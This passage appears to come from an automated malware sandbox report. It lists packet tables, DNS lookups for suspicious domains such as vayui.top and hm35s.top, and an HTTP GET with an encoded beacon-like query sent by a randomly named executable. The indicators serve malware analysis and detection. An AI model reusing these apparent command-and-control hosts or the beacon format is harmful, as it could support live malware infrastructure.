                                                                                                            Dec 12, 2024 21:48:34.636274099 CET4983580192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:34.797769070 CET804983543.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:35.653963089 CET4984180192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:35.774068117 CET804984143.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:35.774280071 CET4984180192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:35.793745041 CET4984180192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:35.913609028 CET804984143.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:35.913625956 CET804984143.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:35.913657904 CET804984143.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:35.913670063 CET804984143.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:35.913768053 CET804984143.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:35.913793087 CET804984143.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:35.913922071 CET804984143.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:35.913933992 CET804984143.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:35.913945913 CET804984143.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:37.313786983 CET4984180192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:37.477617979 CET804984143.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:38.325984955 CET4985280192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:38.448287010 CET804985243.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:38.448406935 CET4985280192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:38.456708908 CET4985280192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:38.576754093 CET804985243.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:52.347321987 CET804982943.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:52.347560883 CET4982980192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:55.034579992 CET804983543.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:55.034651995 CET4983580192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:48:57.690956116 CET804984143.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:48:57.691035032 CET4984180192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:49:00.394149065 CET804985243.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:49:00.394419909 CET4985280192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:49:00.395170927 CET4985280192.168.2.443.199.54.158
                                                                                                            Dec 12, 2024 21:49:00.514967918 CET804985243.199.54.158192.168.2.4
                                                                                                            Dec 12, 2024 21:49:05.810741901 CET4991380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:05.931240082 CET8049913154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:05.931384087 CET4991380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:05.950001955 CET4991380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:06.071412086 CET8049913154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:07.463159084 CET4991380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:07.463759899 CET8049913154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:07.463823080 CET8049913154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:07.463834047 CET4991380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:07.463881969 CET4991380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:07.582973957 CET8049913154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:07.583081007 CET4991380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:08.482222080 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:08.601959944 CET8049923154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:08.602113962 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:08.616202116 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:08.736061096 CET8049923154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:10.119467974 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:10.154843092 CET8049923154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:10.155162096 CET8049923154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:10.155244112 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:10.155417919 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:10.239603043 CET8049923154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:10.243660927 CET4992380192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:11.165293932 CET4993080192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:11.284967899 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.285042048 CET4993080192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:11.309892893 CET4993080192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:11.429676056 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.429744005 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.429856062 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.429869890 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.429904938 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.429965019 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.429987907 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.430097103 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:11.430109024 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:12.800817013 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:12.800920010 CET8049930154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:12.801204920 CET4993080192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:12.822654963 CET4993080192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:13.851336002 CET4993680192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:13.971210957 CET8049936154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:13.971359015 CET4993680192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:14.031729937 CET4993680192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:14.151433945 CET8049936154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:15.561419964 CET8049936154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:15.562258959 CET8049936154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:15.562391996 CET4993680192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:15.565289974 CET4993680192.168.2.4154.88.22.105
                                                                                                            Dec 12, 2024 21:49:15.685069084 CET8049936154.88.22.105192.168.2.4
                                                                                                            Dec 12, 2024 21:49:21.052495003 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:21.172420025 CET8049952154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:21.172529936 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:21.185236931 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:21.305402994 CET8049952154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:22.697578907 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:22.730657101 CET8049952154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:22.730720043 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:22.730799913 CET8049952154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:22.730843067 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:22.817352057 CET8049952154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:22.817450047 CET4995280192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:23.717401028 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:23.837290049 CET8049959154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:23.837388992 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:23.857618093 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:23.977701902 CET8049959154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:25.372601032 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:25.373651028 CET8049959154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:25.373718977 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:25.373759985 CET8049959154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:25.373825073 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:25.492461920 CET8049959154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:25.492580891 CET4995980192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:26.389389038 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:26.509351969 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.509620905 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:26.526307106 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:26.646215916 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646234035 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646317959 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646336079 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646471977 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646487951 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646655083 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646704912 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:26.646786928 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:28.058439970 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:28.083762884 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:28.083842039 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:28.083981037 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:28.084028006 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:28.178453922 CET8049967154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:28.178505898 CET4996780192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:29.077131987 CET4997380192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:29.196997881 CET8049973154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:29.197133064 CET4997380192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:29.204853058 CET4997380192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:29.324613094 CET8049973154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:30.751588106 CET8049973154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:30.751705885 CET8049973154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:30.751909018 CET4997380192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:30.753979921 CET4997380192.168.2.4154.23.184.95
                                                                                                            Dec 12, 2024 21:49:30.873811007 CET8049973154.23.184.95192.168.2.4
                                                                                                            Dec 12, 2024 21:49:36.290565014 CET4999080192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:36.410459042 CET8049990161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:36.410543919 CET4999080192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:36.423399925 CET4999080192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:36.543241978 CET8049990161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:37.743752003 CET8049990161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:37.743796110 CET8049990161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:37.743829966 CET8049990161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:37.743891001 CET4999080192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:37.743916035 CET4999080192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:37.931962013 CET4999080192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:38.950894117 CET4999780192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:39.070913076 CET8049997161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:39.071017981 CET4999780192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:39.090007067 CET4999780192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:39.210129976 CET8049997161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:40.369549990 CET8049997161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:40.369642973 CET8049997161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:40.369735003 CET4999780192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:40.369771957 CET8049997161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:40.369829893 CET4999780192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:40.604077101 CET4999780192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:41.622080088 CET5000480192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:41.741934061 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.742027998 CET5000480192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:41.757076025 CET5000480192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:41.877100945 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877116919 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877218962 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877243996 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877372980 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877382040 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877511024 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877537966 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:41.877552032 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:42.990283966 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:42.990377903 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:42.990482092 CET5000480192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:43.073491096 CET8050004161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:43.073563099 CET5000480192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:43.260271072 CET5000480192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:44.278641939 CET5001280192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:44.398540020 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:44.398679018 CET5001280192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:44.407048941 CET5001280192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:44.526804924 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:45.654665947 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:45.654725075 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:45.654742956 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:45.654891014 CET5001280192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:45.656727076 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:45.656893015 CET5001280192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:45.659216881 CET5001280192.168.2.4161.97.142.144
                                                                                                            Dec 12, 2024 21:49:45.779045105 CET8050012161.97.142.144192.168.2.4
                                                                                                            Dec 12, 2024 21:49:51.149918079 CET5002580192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:51.269850016 CET805002566.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:51.269964933 CET5002580192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:51.284840107 CET5002580192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:51.404591084 CET805002566.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:52.512181044 CET805002566.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:52.512530088 CET805002566.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:52.512820005 CET5002580192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:52.793399096 CET5002580192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:53.811182022 CET5002680192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:53.931113005 CET805002666.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:53.931246042 CET5002680192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:53.945494890 CET5002680192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:54.065313101 CET805002666.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:55.205210924 CET805002666.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:55.206872940 CET805002666.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:55.206948996 CET5002680192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:55.447633982 CET5002680192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:56.466384888 CET5002780192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:56.586353064 CET805002766.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:56.586591959 CET5002780192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:56.600903034 CET5002780192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:56.721033096 CET805002766.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:56.721064091 CET805002766.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:56.721122026 CET805002766.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:56.721180916 CET805002766.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:56.721196890 CET805002766.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:56.721210003 CET805002766.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:56.721235037 CET805002766.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:56.721246004 CET805002766.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:56.721261024 CET805002766.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:57.911501884 CET805002766.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:57.911560059 CET805002766.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:57.911741018 CET5002780192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:58.104067087 CET5002780192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:59.122849941 CET5002880192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:59.258543015 CET805002866.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:49:59.258829117 CET5002880192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:59.267200947 CET5002880192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:49:59.387022018 CET805002866.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:50:00.512592077 CET805002866.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:50:00.512840033 CET805002866.29.149.46192.168.2.4
                                                                                                            Dec 12, 2024 21:50:00.513086081 CET5002880192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:50:00.515083075 CET5002880192.168.2.466.29.149.46
                                                                                                            Dec 12, 2024 21:50:00.837572098 CET805002866.29.149.46192.168.2.4

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 12, 2024 21:48:13.186500072 CET5096753192.168.2.41.1.1.1
                                                                                                            Dec 12, 2024 21:48:13.510210991 CET53509671.1.1.1192.168.2.4
                                                                                                            Dec 12, 2024 21:48:29.942231894 CET5527553192.168.2.41.1.1.1
                                                                                                            Dec 12, 2024 21:48:30.338310003 CET53552751.1.1.1192.168.2.4
                                                                                                            Dec 12, 2024 21:49:05.404201984 CET6193653192.168.2.41.1.1.1
                                                                                                            Dec 12, 2024 21:49:05.808686972 CET53619361.1.1.1192.168.2.4
                                                                                                            Dec 12, 2024 21:49:20.575575113 CET5800253192.168.2.41.1.1.1
                                                                                                            Dec 12, 2024 21:49:21.050338984 CET53580021.1.1.1192.168.2.4
                                                                                                            Dec 12, 2024 21:49:35.763248920 CET5946553192.168.2.41.1.1.1
                                                                                                            Dec 12, 2024 21:49:36.288496971 CET53594651.1.1.1192.168.2.4
                                                                                                            Dec 12, 2024 21:49:50.669728994 CET5755053192.168.2.41.1.1.1
                                                                                                            Dec 12, 2024 21:49:51.147485018 CET53575501.1.1.1192.168.2.4

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Dec 12, 2024 21:48:13.186500072 CET192.168.2.41.1.1.10x3163Standard query (0)www.vayui.topA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:48:29.942231894 CET192.168.2.41.1.1.10x2cfdStandard query (0)www.327531.buzzA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:49:05.404201984 CET192.168.2.41.1.1.10xe28aStandard query (0)www.cg19g5.proA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:49:20.575575113 CET192.168.2.41.1.1.10x4bdbStandard query (0)www.hm35s.topA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:49:35.763248920 CET192.168.2.41.1.1.10xac80Standard query (0)www.030002350.xyzA (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:49:50.669728994 CET192.168.2.41.1.1.10xe263Standard query (0)www.elitevibes.topA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Dec 12, 2024 21:47:13.039526939 CET1.1.1.1192.168.2.40x126fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:47:13.039526939 CET1.1.1.1192.168.2.40x126fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:47:16.803337097 CET1.1.1.1192.168.2.40x59cbNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:47:16.803337097 CET1.1.1.1192.168.2.40x59cbNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:47:49.318325043 CET1.1.1.1192.168.2.40xa516No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:47:49.318325043 CET1.1.1.1192.168.2.40xa516No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:48:13.510210991 CET1.1.1.1192.168.2.40x3163No error (0)www.vayui.top104.21.95.160A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:48:13.510210991 CET1.1.1.1192.168.2.40x3163No error (0)www.vayui.top172.67.145.234A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:48:30.338310003 CET1.1.1.1192.168.2.40x2cfdNo error (0)www.327531.buzz43.199.54.158A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:49:05.808686972 CET1.1.1.1192.168.2.40xe28aNo error (0)www.cg19g5.pro154.88.22.105A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:49:21.050338984 CET1.1.1.1192.168.2.40x4bdbNo error (0)www.hm35s.tophm35s.topCNAME (Canonical name)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:49:21.050338984 CET1.1.1.1192.168.2.40x4bdbNo error (0)hm35s.top154.23.184.95A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:49:36.288496971 CET1.1.1.1192.168.2.40xac80No error (0)www.030002350.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                                            Dec 12, 2024 21:49:51.147485018 CET1.1.1.1192.168.2.40xe263No error (0)www.elitevibes.top66.29.149.46A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • www.vayui.top
                                                                                                            • www.327531.buzz
                                                                                                            • www.cg19g5.pro
                                                                                                            • www.hm35s.top
                                                                                                            • www.030002350.xyz
                                                                                                            • www.elitevibes.top

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.449793104.21.95.160805728C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Dec 12, 2024 21:48:13.648102045 CET506OUTGET /7nvw/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=bbdDITTjVn5ZxI6BCVqDUznXmSvHXBsPP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229jlS83e+IdiqUppR8vJ/svaOFLmkzPo3ErA= HTTP/1.1
                                                                                                            Host: www.vayui.top
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                                                                                                            Dec 12, 2024 21:48:14.889898062 CET912INHTTP/1.1 404 Not Found
                                                                                                            Date: Thu, 12 Dec 2024 20:48:14 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BlQX96oRm1u4q84MAIlilOHWBs91qFyKR9vQrP1hbBjv9hp0BZTwOnfY7K8czr2GBiyMuEu%2FMdgZwoMFtQAtC7y1n2N3sl0CJfwARvR80YGdpxGph%2BrW6HkQag2sJlPC"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f1092fb1ff0c470-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1517&min_rtt=1517&rtt_var=758&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=506&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
